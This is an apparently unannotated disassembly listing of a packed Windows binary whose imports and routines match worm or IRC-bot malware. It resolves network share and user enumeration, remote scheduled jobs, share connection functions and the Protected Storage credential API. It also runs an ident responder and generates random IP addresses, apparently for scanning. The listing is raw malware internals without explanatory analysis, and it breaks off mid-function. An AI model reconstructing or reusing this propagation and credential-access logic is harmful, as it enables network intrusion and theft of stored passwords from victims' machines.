mov eax, [ebp+var_20]
imul eax, 30h
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_40374C
push 8
call ds:dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40374C: ; CODE XREF: sub_403588+1B2�j
mov eax, [ebp+var_20]
imul eax, 30h
push eax
push 0
push [ebp+var_1C]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_10], 2
cmp [ebp+arg_4], 0
jz short loc_403790
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp+var_E], ax
loc_403790: ; CODE XREF: sub_403588+1F2�j
and [ebp+var_18], 0
jmp short loc_40379D
; ---------------------------------------------------------------------------
loc_403796: ; CODE XREF: sub_403588:loc_4038A7�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_40379D: ; CODE XREF: sub_403588+20C�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_20]
jnb loc_4038AC
cmp [ebp+arg_8], 0
jz short loc_4037B9
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_40], eax
jmp short loc_4037C0
; ---------------------------------------------------------------------------
loc_4037B9: ; CODE XREF: sub_403588+225�j
mov [ebp+var_40], 4
loc_4037C0: ; CODE XREF: sub_403588+22F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_40]
mov [ecx+eax], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_4037F1
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_44], eax
jmp short loc_4037F8
; ---------------------------------------------------------------------------
loc_4037F1: ; CODE XREF: sub_403588+25C�j
mov [ebp+var_44], 1
loc_4037F8: ; CODE XREF: sub_403588+267�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_44]
mov [ecx+eax+8], edx
cmp [ebp+arg_8], 0
jz short loc_403819
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_48], eax
jmp short loc_403820
; ---------------------------------------------------------------------------
loc_403819: ; CODE XREF: sub_403588+284�j
mov [ebp+var_48], 6
loc_403820: ; CODE XREF: sub_403588+28F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_48]
mov [ecx+eax+0Ch], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+10h], 10h
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
mov ecx, [ebp+var_18]
imul ecx, 30h
mov edx, [ebp+var_1C]
mov [edx+ecx+18h], eax
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_18]
mov eax, [eax+ecx*4]
mov eax, [eax]
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
cmp [ebp+var_18], 0
jz short loc_4038A7
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
add ecx, eax
mov eax, [ebp+var_18]
dec eax
imul eax, 30h
mov edx, [ebp+var_1C]
mov [edx+eax+1Ch], ecx
loc_4038A7: ; CODE XREF: sub_403588+304�j
jmp loc_403796
; ---------------------------------------------------------------------------
loc_4038AC: ; CODE XREF: sub_403588+21B�j
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_1C]
mov [eax], ecx
xor eax, eax
locret_4038B6: ; CODE XREF: sub_403588+2E�j
; sub_403588+55�j ...
leave
retn 10h
sub_403588 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038BA proc near ; DATA XREF: sub_403BD3+1BC�o
var_434 = dword ptr -434h
var_430 = byte ptr -430h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 434h
cmp [ebp+arg_8], 0
jnz short loc_4038CF
cmp [ebp+arg_10], 0
jz short loc_4038D8
loc_4038CF: ; CODE XREF: sub_4038BA+D�j
mov eax, [ebp+arg_18]
and al, 0E0h
test eax, eax
jz short loc_4038ED
loc_4038D8: ; CODE XREF: sub_4038BA+13�j
push 2726h
call ds:dword_417234 ; WSASetLastError
mov eax, 2726h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4038ED: ; CODE XREF: sub_4038BA+1C�j
mov eax, [ebp+arg_0]
mov [ebp+var_40C], eax
mov eax, [ebp+var_40C]
movsx eax, word ptr [eax]
cmp eax, 2
jz short loc_403919
push 273Fh
call ds:dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403919: ; CODE XREF: sub_4038BA+48�j
cmp [ebp+arg_8], 0
jz loc_403ABA
mov eax, [ebp+var_40C]
push dword ptr [eax+4]
call ds:dword_41721C ; inet_ntoa
mov [ebp+var_434], eax
cmp [ebp+var_434], 0
jnz short loc_403949
or eax, 0FFFFFFFFh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403949: ; CODE XREF: sub_4038BA+85�j
push 401h
push [ebp+var_434]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+arg_18]
and eax, 2
test eax, eax
jz short loc_403972
jmp loc_403BB4
; ---------------------------------------------------------------------------
loc_403972: ; CODE XREF: sub_4038BA+B1�j
mov eax, [ebp+arg_18]
and eax, 4
test eax, eax
jz short loc_4039F4
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_4039AA
call ds:dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039AA: ; CODE XREF: sub_4038BA+E3�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_4039D3
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039D3: ; CODE XREF: sub_4038BA+102�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp loc_403ABA
; ---------------------------------------------------------------------------
loc_4039F4: ; CODE XREF: sub_4038BA+C0�j
mov eax, [ebp+arg_18]
and eax, 1
test eax, eax
jz loc_403A92
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 7F000001h
jz short loc_403A1D
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 0
jnz short loc_403A92
loc_403A1D: ; CODE XREF: sub_4038BA+155�j
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_403A4B
call ds:dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A4B: ; CODE XREF: sub_4038BA+184�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403A74
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A74: ; CODE XREF: sub_4038BA+1A3�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_403ABA
; ---------------------------------------------------------------------------
loc_403A92: ; CODE XREF: sub_4038BA+142�j
; sub_4038BA+161�j ...
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403ABA
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403ABA: ; CODE XREF: sub_4038BA+63�j
; sub_4038BA+135�j ...
cmp [ebp+arg_10], 0
jz loc_403B99
push 8
pop eax
test eax, eax
jz short loc_403B2C
push 0Ah
lea eax, [ebp+var_430]
push eax
mov eax, [ebp+var_40C]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_430]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B19
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403B19: ; CODE XREF: sub_4038BA+248�j
lea eax, [ebp+var_430]
push eax
push [ebp+arg_10]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_403B99
; ---------------------------------------------------------------------------
loc_403B2C: ; CODE XREF: sub_4038BA+20F�j
mov eax, [ebp+arg_18]
and eax, 10h
neg eax
sbb eax, eax
and eax, offset aUdp ; "udp"
push eax
mov eax, [ebp+var_40C]
movzx eax, word ptr [eax+2]
push eax
call ds:dword_417228 ; getservbyport
mov [ebp+var_408], eax
cmp [ebp+var_408], 0
jnz short loc_403B61
or eax, 0FFFFFFFFh
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B61: ; CODE XREF: sub_4038BA+2A0�j
mov eax, [ebp+var_408]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B87
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B87: ; CODE XREF: sub_4038BA+2B9�j
mov eax, [ebp+var_408]
push dword ptr [eax]
push [ebp+arg_10]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403B99: ; CODE XREF: sub_4038BA+204�j
; sub_4038BA+270�j
cmp [ebp+arg_8], 0
jz short loc_403BB0
lea eax, [ebp+var_404]
push eax
push [ebp+arg_8]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403BB0: ; CODE XREF: sub_4038BA+2E3�j
xor eax, eax
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403BB4: ; CODE XREF: sub_4038BA+B3�j
jmp loc_403A92
; ---------------------------------------------------------------------------
locret_403BB9: ; CODE XREF: sub_4038BA+2E�j
; sub_4038BA+5A�j ...
leave
retn 1Ch
sub_4038BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BBD proc near ; DATA XREF: sub_403BD3+1C6�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_403BCF
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
loc_403BCF: ; CODE XREF: sub_403BBD+7�j
pop ebp
retn 4
sub_403BBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BD3 proc near ; CODE XREF: UPX0:loc_4168BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_403C00
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push [ebp+var_C]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF10, eax
loc_403C00: ; CODE XREF: sub_403BD3+18�j
push offset aNetapi32_dll ; "netapi32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_403CC3
push offset aNetusegetinfo ; "NetUseGetInfo"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF18, eax
push offset aNetuseadd ; "NetUseAdd"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF1C, eax
push offset aNetusedel ; "NetUseDel"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF20, eax
push offset aNetuserenum ; "NetUserEnum"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF24, eax
push offset aNetshareenum ; "NetShareEnum"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF28, eax
push offset aNetremotetod ; "NetRemoteTOD"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF2C, eax
push offset aNetapibufferfr ; "NetApiBufferFree"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF30, eax
push offset aNetschedulejob ; "NetScheduleJobAdd"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF34, eax
push offset aNetaddalternat ; "NetAddAlternateComputerName"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF38, eax
loc_403CC3: ; CODE XREF: sub_403BD3+3F�j
push offset aMpr_dll ; "mpr.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403D23
push offset aWnetaddconnect ; "WNetAddConnection2A"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF3C, eax
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF40, eax
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF44, eax
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF48, eax
loc_403D23: ; CODE XREF: sub_403BD3+102�j
push offset aWs2_32_dll ; "ws2_32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
push offset aGetaddrinfo ; "getaddrinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF54, eax
push offset aGetnameinfo ; "getnameinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF58, eax
push offset aFreeaddrinfo ; "freeaddrinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF5C, eax
cmp ds:dword_41DF54, 0
jz short loc_403D85
cmp ds:dword_41DF58, 0
jz short loc_403D85
cmp ds:dword_41DF5C, 0
jnz short loc_403DA3
loc_403D85: ; CODE XREF: sub_403BD3+19E�j
; sub_403BD3+1A7�j
mov ds:dword_41DF54, offset sub_403588
mov ds:dword_41DF58, offset sub_4038BA
mov ds:dword_41DF5C, offset sub_403BBD
loc_403DA3: ; CODE XREF: sub_403BD3+1B0�j
push offset aPstorec_dll ; "pstorec.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_403DCA
push offset aPstorecreatein ; "PStoreCreateInstance"
push [ebp+var_10]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF50, eax
loc_403DCA: ; CODE XREF: sub_403BD3+1E2�j
push offset aWininet_dll ; "wininet.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short locret_403DF1
push offset aInternetgetcon ; "InternetGetConnectedStateExA"
push [ebp+var_18]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF4C, eax
locret_403DF1: ; CODE XREF: sub_403BD3+209�j
leave
retn
sub_403BD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF3 proc near ; DATA XREF: sub_403FE5+89�o
var_1228 = dword ptr -1228h
var_1224 = byte ptr -1224h
var_1200 = byte ptr -1200h
var_11DC = byte ptr -11DCh
var_11B8 = dword ptr -11B8h
var_11B4 = dword ptr -11B4h
var_11B0 = dword ptr -11B0h
var_11AC = byte ptr -11ACh
var_11A6 = byte ptr -11A6h
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1228h
call sub_416BC0
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_11B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_11AC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_11B4], eax
cmp [ebp+var_11B4], 0
jnz short loc_403E52
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_403FE1
; ---------------------------------------------------------------------------
loc_403E52: ; CODE XREF: sub_403DF3+4A�j
lea eax, [ebp+var_11AC]
push eax
mov eax, [ebp+var_11B0]
push dword ptr [eax]
push offset dword_4189C4
lea eax, [ebp+var_11A6]
push eax
call sub_40D53F
add esp, 10h
loc_403E75: ; CODE XREF: sub_403DF3+BD�j
; sub_403DF3+10F�j ...
push 3E8h
push [ebp+var_11B4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_11B8], eax
mov eax, [ebp+var_11B0]
cmp dword ptr [eax+4], 0
jnz short loc_403EA2
cmp [ebp+var_11B8], 0
jnz short loc_403EA7
loc_403EA2: ; CODE XREF: sub_403DF3+A4�j
jmp loc_403FC7
; ---------------------------------------------------------------------------
loc_403EA7: ; CODE XREF: sub_403DF3+AD�j
cmp [ebp+var_11B8], 0FFFFFFFFh
jnz short loc_403EB2
jmp short loc_403E75
; ---------------------------------------------------------------------------
loc_403EB2: ; CODE XREF: sub_403DF3+BB�j
push 1000h
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_1228], eax
cmp [ebp+var_1228], 0
jz short loc_403EF6
cmp [ebp+var_1228], 0FFFFFFFFh
jz short loc_403EF6
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 10h
jbe short loc_403F07
loc_403EF6: ; CODE XREF: sub_403DF3+E6�j
; sub_403DF3+EF�j
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403F07: ; CODE XREF: sub_403DF3+101�j
movsx eax, ds:byte_41EF98
test eax, eax
jz short loc_403F27
push offset byte_41EF98
lea eax, [ebp+var_1224]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_403F57
; ---------------------------------------------------------------------------
loc_403F27: ; CODE XREF: sub_403DF3+11D�j
lea eax, [ebp+var_1200]
push eax
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_11DC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1224]
push eax
push offset byte_41EF98
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403F57: ; CODE XREF: sub_403DF3+132�j
push offset aUseridUnix ; " : USERID : UNIX : "
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053BF
add esp, 0Ch
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403DF3:loc_403EA2�j
push [ebp+var_11B4]
call sub_404CBB
pop ecx
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
locret_403FE1: ; CODE XREF: sub_403DF3+5A�j
leave
retn 4
sub_403DF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FE5 proc near ; CODE XREF: sub_40A9CF+EEC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_403FFD
push [ebp+arg_4]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_404004
loc_403FFD: ; CODE XREF: sub_403FE5+9�j
mov [ebp+arg_4], offset dword_418A18
loc_404004: ; CODE XREF: sub_403FE5+16�j
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40401A
jmp short locret_40407B
; ---------------------------------------------------------------------------
loc_40401A: ; CODE XREF: sub_403FE5+31�j
push 6
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
cmp [ebp+arg_0], 0
jz short loc_404059
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
test eax, eax
jz short loc_404059
and [ebp+var_8], 0
jmp short loc_404060
; ---------------------------------------------------------------------------
loc_404059: ; CODE XREF: sub_403FE5+5E�j
; sub_403FE5+6C�j
mov [ebp+var_8], 1
loc_404060: ; CODE XREF: sub_403FE5+72�j
push [ebp+arg_4]
push offset dword_4189F8
push [ebp+var_8]
push [ebp+var_4]
push offset sub_403DF3
call sub_4095A4
add esp, 14h
locret_40407B: ; CODE XREF: sub_403FE5+33�j
leave
retn
sub_403FE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40407D proc near ; CODE XREF: sub_4055E5+772�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
loc_404085: ; CODE XREF: sub_40407D+2C�j
cmp [ebp+arg_4], 1
jbe short loc_4040AB
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
dec eax
mov [ebp+arg_4], eax
jmp short loc_404085
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_40407D+C�j
cmp [ebp+arg_4], 0
jz short loc_4040BF
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_4040BF: ; CODE XREF: sub_40407D+32�j
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
not eax
leave
retn
sub_40407D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040E8 proc near ; CODE XREF: sub_4055E5+752�p
; sub_40A9CF+1A2F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
cmp [ebp+var_4], 2
jz short loc_404146
cmp [ebp+var_4], 3
jz short loc_404124
cmp [ebp+var_4], 4
jz short loc_404106
jmp short loc_40416A
; ---------------------------------------------------------------------------
loc_404106: ; CODE XREF: sub_4040E8+1A�j
mov eax, [ebp+arg_0]
and al, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404124: ; CODE XREF: sub_4040E8+14�j
mov eax, [ebp+arg_0]
and ah, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 8
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404146: ; CODE XREF: sub_4040E8+E�j
mov eax, [ebp+arg_0]
and eax, 0FF00FFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 10h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_40416A: ; CODE XREF: sub_4040E8+1C�j
mov eax, [ebp+arg_0]
and eax, 0FFFFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 18h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
mov eax, [ebp+arg_0]
leave
retn
sub_4040E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404193 proc near ; CODE XREF: sub_404279+A�p
; sub_40435B+17�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0Ah
push [ebp+arg_0]
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
pop ebp
retn
sub_404193 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041B7 proc near ; CODE XREF: sub_40D871+5B3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push offset dword_418A48
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041D5
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041D5: ; CODE XREF: sub_4041B7+17�j
push 4
push offset dword_418A40
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041F0
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041F0: ; CODE XREF: sub_4041B7+32�j
push 8
push offset dword_418A34
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40420B
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_40420B: ; CODE XREF: sub_4041B7+4D�j
push 3
push offset dword_418A30
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_404226
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_404226: ; CODE XREF: sub_4041B7+68�j
xor eax, eax
loc_404228: ; CODE XREF: sub_4041B7+1C�j
; sub_4041B7+37�j ...
pop ebp
retn
sub_4041B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40422A proc near ; CODE XREF: sub_402A32+206�p
; sub_403FE5+E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_40423C
; ---------------------------------------------------------------------------
loc_404235: ; CODE XREF: sub_40422A:loc_404273�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40423C: ; CODE XREF: sub_40422A+9�j
cmp [ebp+var_4], 6
jnz short loc_404244
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_404244: ; CODE XREF: sub_40422A+16�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_404273
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40426C
cmp [ebp+var_8], 0FFFFh
jbe short loc_40426E
loc_40426C: ; CODE XREF: sub_40422A+37�j
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_40426E: ; CODE XREF: sub_40422A+40�j
push 1
pop eax
jmp short locret_404277
; ---------------------------------------------------------------------------
loc_404273: ; CODE XREF: sub_40422A+25�j
jmp short loc_404235
; ---------------------------------------------------------------------------
loc_404275: ; CODE XREF: sub_40422A+18�j
; sub_40422A:loc_40426C�j
xor eax, eax
locret_404277: ; CODE XREF: sub_40422A+47�j
leave
retn
sub_40422A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404279 proc near ; CODE XREF: sub_4042FB+C�p
; sub_408B30+197�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_8]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4042A4
push 1
pop eax
jmp short locret_4042F9
; ---------------------------------------------------------------------------
loc_4042A4: ; CODE XREF: sub_404279+24�j
push 0BB8h
push 0
lea eax, [ebp+var_8]
push eax
push offset dword_41F018
call sub_4050EA
add esp, 10h
mov [ebp+var_C], eax
push [ebp+var_10]
